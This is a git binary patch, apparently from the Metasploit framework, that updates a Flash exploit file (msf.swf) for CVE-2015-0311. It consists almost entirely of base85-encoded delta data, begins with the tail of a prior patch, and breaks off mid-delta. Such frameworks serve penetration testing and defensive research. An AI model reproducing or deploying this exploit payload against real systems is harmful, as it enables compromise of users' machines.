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
D$W@ru


From 1bf1c37cfa39e11ea900929a3bfd0957e5172df1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 14:31:07 -0500
Subject: [PATCH 0193/1013] Add exception handling

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20417 -> 20512 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index 2af1bcae87d26c5512e73c560154364dfa41162f..90b0f1dea49817641b5d9f4b4245332b8c130a71 100644
GIT binary patch
delta 20390
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
